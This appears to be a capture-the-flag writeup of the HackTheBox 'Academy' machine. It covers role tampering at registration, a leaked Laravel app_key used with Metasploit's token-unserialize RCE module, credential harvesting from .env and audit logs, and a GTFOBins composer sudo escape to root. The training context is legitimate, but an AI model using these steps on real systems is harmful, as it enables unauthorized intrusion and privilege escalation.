Posts Hackthebox Academy writeup
Post
Cancel

Hackthebox Academy writeup

Introduction@Academy:~$

Column Details
Name Academy
IP 10.10.10.215
Points 20
Os Linux
Difficulty Easy
Creator egre55 & mrb3n
Out On 07 Nov 2020

Summary

  • Nmap shows the 2 Ports open.
  • Getting the web server
  • Register the user and change the role to 0 to 1
  • geeting a /admin.php directory.
  • find another sub-domain
  • found a app_key
  • geeting a www-data withmetasploit.
  • using GTFO-Bins To get root.

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌─[root@d3dsec]─[~/Desktop/HTB/Academy]
└──╼ #cat nmap/result.nmap 
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.215
Nmap scan report for 10.10.10.214
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
                                                                

So basically Two ports are opened 22:ssh 80:http

Port-80

Before going to 80 port add the academy.htb sub-domain in your /etc/hosts file.

Port-80

There is a simple htb academy web page.

Let's go to register page.

Before click on register page let's capture this request in burpsuite.

Port-80

There is a role id.

Academy.htb

Let's change it to 1 and forward the request.

Academy.htb

Let's go and login in the wepsite.

Academy.htb

There is so many courses.

Academy.htb

Let's use gobuster.

Academy.htb

There is a admin.php let's go to this directory real quick.

Academy.htb

login in with the same credentials which we use in login.php.

username = dedsec

Password = dedsec

there is a academy launch pannel.

Academy.htb

But we find another sub-domain dev-staging-01.academy.htb.

Academy.htb

Let's add this in our /etc/hosts file.

Academy.htb

Let's to to that sub-domain.

Academy.htb

I find two useful thing.

1. app_name = Laravel

2. app_key

Academy.htb

Let's search on google that there is any exploit of Laravel and i found one.

PHP Laravel Framework token Unserialize Remote Command Execution

Academy.htb

the rapid7 wepsite tell how to exploit it with metasploit.

Academy.htb

Without wasting time Let's open our metasploit framework.

1
2

msfdb start
msfconsole
                                                                

Academy.htb

1
2
3
4

set APP_KEY {which you find on web server}
set RHOSTS 10.10.10.215
set VHOST dev-staging-01.academy.htb
set LHOST tun0
                                                                

following the rapid7 article and i set all requirements.

Academy.htb

Now it's time to run the exploit.

Academy.htb

Boom we got the shell as www-data.

Without wasting time i use python3 tty shell to be a stable shell.

Academy.htb

Now it's time for enumeration i found an interesting file .env inside /var/www/html/academy.

Academy.htb

Let's check what inside the file.

Academy.htb

1
2
3
4
5
6

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
                                                                

I found the password mySup3rP4s5w0rd!!

and you remember that we found two username on webserver.

Academy.htb

Let's try this one by one real quick.

Academy.htb

So it's password for cry0l1t3 and we also get the user.txt.

Privilege escalation

Before going to our privilege escalation let's change our shell with ssh.

Academy.htb

Found interesting file called audit.log.3 inside /var/log/audit.

Academy.htb

But it's a very log file so we need to hit and try with su,TTY,pass,user with grep.

Academy.htb

And i found a su command with some data encoded with hex.

Let's try to decrept this. i use hex to ASCII converter.

Academy.htb

we found the password called mrb3n_Ac@d3my!.

Let's try this with username which we find on web server.

Academy.htb

Academy.htb

we got the mrb3n privilege.

Let's try sudo-l real quick.

Academy.htb

We use sudo command with composer.

Composer

Academy.htb

Let's try the command which gtfo bins telling.

1
2
3

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
                                                                

Academy.htb

And we pwned it …….

If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

Resources

Topic Url
PHP Laravel Framework https://www.rapid7.com/db/modules/exploit/unix/http/laravel_token_unserialize_exec
Composer https://gtfobins.github.io/gtfobins/composer/
This post is licensed under CC BY 4.0

Hackthebox Bucket writeup

Fortress Reel2 writeup

© 2020 Dedinfosec . All rights reserved.